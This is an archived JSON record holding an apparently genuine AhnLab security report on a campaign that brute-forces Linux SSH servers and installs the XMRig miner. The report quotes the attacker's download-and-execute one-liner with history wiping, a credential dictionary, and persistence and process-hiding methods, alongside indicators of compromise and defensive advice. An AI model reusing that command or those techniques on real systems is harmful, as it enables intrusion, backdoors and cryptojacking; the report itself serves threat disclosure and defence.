{
	"id": "6e0d8ab7-3242-4c51-9d6f-3d35ca558edb",
	"created_at": "2026-04-06T00:09:55.506264Z",
	"updated_at": "2026-04-10T03:34:59.839779Z",
	"deleted_at": null,
	"sha1_hash": "86dcb88e8ad174d9169c965836b00c32697ebb17",
	"title": "CoinMiner (KONO DIO DA) Distributed to Linux SSH Servers",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2723570,
	"plain_text": "CoinMiner (KONO DIO DA) Distributed to Linux SSH Servers\r\nBy ATCP\r\nPublished: 2023-04-23 · Archived: 2026-04-05 20:30:22 UTC\r\nAhnLab Security Emergency response Center (ASEC) has recently discovered XMRig CoinMiner being installed on poorly\r\nmanaged Linux SSH servers. The attacks have been happening with a distinct pattern since 2022: they involve the usage of\r\nmalware developed with Shell Script Compiler (SHC) when installing the XMRig, as well as the creation of a backdoor SSH\r\naccount.\r\nWhen looking at the attack cases against poorly managed Linux SSH servers, most of them involve the installation of DDoS\r\nBot or CoinMiner. DDoS Bot has been covered here in the ASEC Blog before through the attack cases where ShellBot [1]\r\nand ChinaZ DDoS Bot [2] were installed respectively. The installation of XMRig CoinMiner was covered in tandem with\r\nthe SHC malware [3].\r\nThis blog post will cover one of the various attack cases where CoinMiner is installed. The main features of this attack\r\ncampaign include its relatively recent start, use of SHC, and the inclusion of a personalized message that says “KONO DIO\r\nDA” from the threat actor.\r\n1. Dictionary Attack Against Linux SSH Servers\r\nPoorly managed services are one of the prime examples of attack vectors used to target server environments such as Linux\r\nservers. The Secure Shell (SSH) service is installed in most Linux server environments, can easily be used for attacks, and is\r\nprone to poor management. SSH allows administrators to log in remotely and control the system, but they must log into the\r\nuser account registered to the system to do so.\r\nIf simple account credentials (ID/PW) are used in a Linux system, a threat actor can log into the system through brute force\r\nor a dictionary attack, allowing them to execute malicious commands. 
When Linux SSH servers that are poorly managed are\r\nattacked, the main attack method involves searching externally exposed SSH servers through port scanning and using the\r\nknown account credentials to perform dictionary attacks and log in. Malware is then downloaded afterward.\r\nThe following is a list of IDs/PWs used in those attacks.\r\nID PW Attacker\r\nroot . 23.224.232[.]68\r\nroot … 23.224.232[.]68\r\nroot P@ssw0rd 23.224.232[.]68\r\nadmin password1! 23.224.232[.]68\r\nweb 123456 23.224.232[.]68\r\ntomcat tomcat 23.224.232[.]68\r\ncentos Huawei@123 23.224.232[.]68\r\noracle Huawei@123 23.224.232[.]68\r\nTable 1. Attack sources and account credentials used for the “KONO DIO DA” attacks\r\n2. Cases of KONO DIO DA Attacks – Latest\r\nhttps://asec.ahnlab.com/en/51908/\r\nPage 1 of 7\n\nThe threat actor used the commands below to download and execute malware after successfully logging in. “uname -a” and\r\n“nproc” are commands that output the system information. It is assumed that these are used so that the threat actor can check\r\nwhich systems have a CoinMiner installed on them later on. There are also commands that delete the history of these\r\ncommands after the malware has been executed.\r\n# uname -a;nproc; wget -q 46.41.150[.]129/.bo/am ; chmod +x am ; ./am ; history -c ; rm -rf ~/.bash_history\r\nThe downloaded “am” file is malware that has been developed with SHC, and functions as a downloader. The fact that it\r\nwas developed with SHC means that the original malware is actually a Bash script that has been converted into the ELF\r\nformat. Details regarding SHC have been covered previously in the blog post below.\r\n“am” is a simple downloader that downloads and executes “nw”, while “nw” is also a downloader that ultimately downloads\r\nand executes additional malware. 
The “nw” Bash script forcefully terminates and deletes the CoinMiner it used in the past\r\nalong with its other malware before downloading and executing a compressed file with the XMRig and Bash script malware.\r\nThe compressed file includes the XMRig “dbus-daemon --system --address=systemd_ --nofork --nopidfile --systemd-activation --syslog-only”, the configuration file “config.json”, and three Bash script malware files.\r\n“nw” executes the “start” Bash script inside the compressed file, and “start” is responsible for executing the\r\n“admin” Bash script. “admin” is responsible for registering the cron task, which executes the “root.sh” Bash script\r\nevery minute.\r\n“root.sh” executes the XMRig “dbus-daemon --system --address=systemd_ --nofork --nopidfile --systemd-activation --syslog-only” that exists in the same path, before reading and using the configuration information required for mining from\r\n“config.json”, which also exists in the same path. XMRig is executed under the disguised name of a normal process, “dbus-daemon”. 
Not only does it use the process name, but the arguments used upon execution are also mimicked, making it\r\ndifficult for ordinary users to notice that a CoinMiner is currently running.\r\nMining Pool Wallet\r\nxmr.doi-2020[.]net:14444 85myxAJXqM1i9RLd1b7xq4JddqUTt1fD9ikYNNfwgtZPh42Cm5PSRMQW9R7Sue28TS86bWRkiw3MV\r\nval.doi-2020[.]net:80 87FWpUCibvHQPvqhjyKg6n18yDpLHh96cVMxtPW1WWEhbePvK5LrDhE5sYgHEpRuU1RkJ5VZ8mB\r\n142.202.242[.]45:80 87FWpUCibvHQPvqhjyKg6n18yDpLHh96cVMxtPW1WWEhbePvK5LrDhE5sYgHEpRuU1RkJ5VZ8mB\r\npool.hashvault[.]pro:80 87FWpUCibvHQPvqhjyKg6n18yDpLHh96cVMxtPW1WWEhbePvK5LrDhE5sYgHEpRuU1RkJ5VZ8mB\r\nAS.doi-2020[.]net:80 85myxAJXqM1i9RLd1b7xq4JddqUTt1fD9ikYNNfwgtZPh42Cm5PSRMQW9R7Sue28TS86bWRkiw3MV\r\n139.99.123[.]196:80 85myxAJXqM1i9RLd1b7xq4JddqUTt1fD9ikYNNfwgtZPh42Cm5PSRMQW9R7Sue28TS86bWRkiw3MV\r\npool.supportxmr[.]com:80 87FWpUCibvHQPvqhjyKg6n18yDpLHh96cVMxtPW1WWEhbePvK5LrDhE5sYgHEpRuU1RkJ5VZ8mB\r\nTable 2. Threat actor’s XMRig mining information\r\n3. Cases of KONO DIO DA Attacks – Past\r\nLooking at past cases, it is apparent that the malware used in recent attacks has fewer features than before. The initially\r\ninstalled file cannot be confirmed, but “hoze” is a Bash script that performs the same functions as “nw”. “hoze”\r\ndecompresses the downloaded compressed file and executes an ELF file named “init0”. “init0” is a malware strain that\r\nprovides various additional features such as installing the XMRig CoinMiner.\r\nUnlike the recently confirmed attacks, the “KONO DIO DA” threat actor used a wider variety of features during their past\r\nattacks. The feature to maintain persistence was one of the main features they used. A “key” file existed in the compressed\r\nfile.\r\nThe following public SSH key was included in the “key” file. 
“init0” removes the existing “~/.ssh/authorized_keys” file and\r\ncopies the “key” file that was inside the compressed file to that directory.\r\nssh-rsa\r\nAAAAB3NzaC1yc2EAAAADAQABAAABAQCh047MLLA8ul64R+zVcEezUGtPUhnB+6mSzXoikFgju2orDUBX4K1ve/SW2pMQeQf9ErQoj\r\nrsa-key\r\nWhen logging into a remote SSH server, it is possible to log in without an ID and PW by generating public and private keys.\r\nTo accomplish this, a user can generate public and private SSH keys and then register their public key to their desired server.\r\nAfterward, the private key can be used to log into the client. In this case, the threat actor creates and registers their public\r\nkey, which is the “key” file, to the “~/.ssh/authorized_keys” path. This allows them to use their private key later to log into\r\nthe infected system.\r\nBesides this, the threat actor can use the usermod command to add an account called “cheeki”. If the infected system has an\r\naccount called “root”, “dolphinscheduler”, “admin”, “es”, or “hadoop”, then the password is changed by the threat actor.\r\nThis process is a persistence maintenance technique that creates a backdoor account on an infected system, allowing the\r\nthreat actor to log in at a later date.\r\nThe “uninstall.sh” Bash script is responsible for removing Alibaba Cloud Shield (Aegis), the security service of Alibaba\r\nCloud. kinsing is a malware strain that is primarily used to remove Aegis. kinsing installs a Bash script that is capable of\r\nremoving not only Aegis, but Tencent QCloud Monitor as well. It is also capable of disabling SELinux and AppArmor.\r\nContrary to its name, “init.sh” is an SHC ELF file, and its simple structure is shown below. It is responsible for executing\r\nthe CoinMiner and hiding the process. To do this, it creates the “/var/tmp/…” directory and uses the mount command to bind\r\nthe directory to the /proc file system on the PID of the miner process. 
This is one of the previously known methods used to\r\nconceal processes. The threat actor uses this simple command instead of a rootkit to conceal the CoinMiner’s process.\r\nThe aforementioned scripts and SHC ELF files perform supplementary roles, while “secure” is responsible for the main\r\nfeatures. “secure” is an ELF file built with SHC, and is responsible for executing the XMRig CoinMiner, installing the latest\r\nXMRig, and registering itself in the cron task. Therefore, as it is executed regularly through the cron task, if XMRig does\r\nnot exist on the system, the latest version is downloaded to start mining for cryptocurrency on the infected system.\r\nWhen looking at the attack cases against poorly managed Linux SSH servers, most of them involve the installation of DDoS\r\nBot or CoinMiner. Most CoinMiner attack cases have no notable characteristics, as XMRig is simply installed to mine\r\nMonero Coins. However, the “KONO DIO DA” threat actors use additional malware and various analysis disruption\r\ntechniques in addition to installing XMRig, and these attacks were confirmed relatively recently.\r\nMining Pool Wallet\r\n5.9.157[.]2:10380 TRTLv1M57YFZjutXRds3cNd6iRurtebcy6HxQ6hRMCzGF5nE4sWuqCCX9vamnUcG35BkQy6VfwUy5CsV9Y\r\n2.58.149[.]237:2007 TRTLv1M57YFZjutXRds3cNd6iRurtebcy6HxQ6hRMCzGF5nE4sWuqCCX9vamnUcG35BkQy6VfwUy5CsV9Y\r\nTable 3. Threat actor’s XMRig mining information – Past\r\n4. Conclusion\r\nAttack campaigns where a CoinMiner is installed on poorly managed Linux SSH servers have been occurring persistently\r\nfor a long time. The “KONO DIO DA” attack campaign covered here maintains its persistence by registering a backdoor SSH\r\naccount in addition to installing the XMRig CoinMiner. 
If CoinMiner is installed, system resources are used to mine Monero\r\nCoins for the threat actor, and the threat actor can later log in through the backdoor SSH account to either install additional\r\nmalware, steal information from the system, or perform various other malicious behaviors.\r\nBecause of this, administrators should use passwords that are difficult to guess for their accounts and change them\r\nperiodically to protect the Linux server from brute force attacks and dictionary attacks, and update to the latest patch to\r\nprevent vulnerability attacks. They should also use security programs such as firewalls for servers accessible from outside to\r\nrestrict access by attackers. Finally, caution must be practiced by updating V3 to the latest version to block malware\r\ninfection in advance.\r\nFile Detection\r\n– CoinMiner/Text.Config (2023.04.24.02)\r\n– Downloader/Linux.Agent.1011056 (2023.04.24.02)\r\n– Downloader/Linux.Agent.11344 (2023.04.24.02)\r\n– Downloader/Shell.Agent.SC187868 (2023.04.24.02)\r\n– Downloader/Shell.Agent.SC187872 (2023.04.24.02)\r\n– Linux/CoinMiner.Gen2 (2019.07.31.08)\r\n– Trojan/Linux.Agent.1010416 (2023.04.24.02)\r\n– Trojan/Linux.Hider.1008280 (2023.04.24.02)\r\n– Trojan/Shell.Agent.SC187867 (2023.04.24.02)\r\n– Trojan/Shell.Agent.SC187876 (2023.04.24.02)\r\n– Trojan/Shell.Runner.SC187869 (2023.04.24.02)\r\n– Trojan/Shell.Runner.SC187871 (2023.04.24.02)\r\nMD5\r\n1192697ed3d2302bec3ee828c154e300\r\n1932d2e4081f6dd5c8b32d29b1ab5caf\r\n1db93cb95e409769561efb66e4fd5c72\r\n20ac8a45d129e3ce3444494d9672692c\r\n254784ca05bdd3928d7889d0ea3195ab\r\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttp[:]//141[.]95[.]19[.]91[:]8080/xri/config[.]json\r\nhttp[:]//141[.]95[.]19[.]91[:]8080/xri/xri\r\nhttp[:]//2[.]58[.]149[.]237[:]6972/hoze\r\nhttp[:]//2[.]58[.]149[.]237[:]6972/xri2[.]tar\r\nhttp[:]//46[.]41[.]150[.]129/[.]bo/am\r\nAdditional IOCs are available on AhnLab 
TIP.\r\nFQDN\r\ninit[.]sh\r\nroot[.]sh\r\nuninstall[.]sh\r\nAdditional IOCs are available on AhnLab TIP.\r\nSource: https://asec.ahnlab.com/en/51908/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://asec.ahnlab.com/en/51908/"
	],
	"report_names": [
		"51908"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "3fff98c9-ad02-401d-9d4b-f78b5b634f31",
			"created_at": "2023-01-06T13:46:38.376868Z",
			"updated_at": "2026-04-10T02:00:02.949077Z",
			"deleted_at": null,
			"main_name": "Cleaver",
			"aliases": [
				"G0003",
				"Operation Cleaver",
				"Op Cleaver",
				"Tarh Andishan",
				"Alibaba",
				"TG-2889",
				"Cobalt Gypsy"
			],
			"source_name": "MISPGALAXY:Cleaver",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a6c351ea-01f1-4c9b-af75-cfbb3b269ed3",
			"created_at": "2023-01-06T13:46:39.390649Z",
			"updated_at": "2026-04-10T02:00:03.311299Z",
			"deleted_at": null,
			"main_name": "Kinsing",
			"aliases": [
				"Money Libra"
			],
			"source_name": "MISPGALAXY:Kinsing",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434195,
	"ts_updated_at": 1775792099,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/86dcb88e8ad174d9169c965836b00c32697ebb17.pdf",
		"text": "https://archive.orkl.eu/86dcb88e8ad174d9169c965836b00c32697ebb17.txt",
		"img": "https://archive.orkl.eu/86dcb88e8ad174d9169c965836b00c32697ebb17.jpg"
	}
}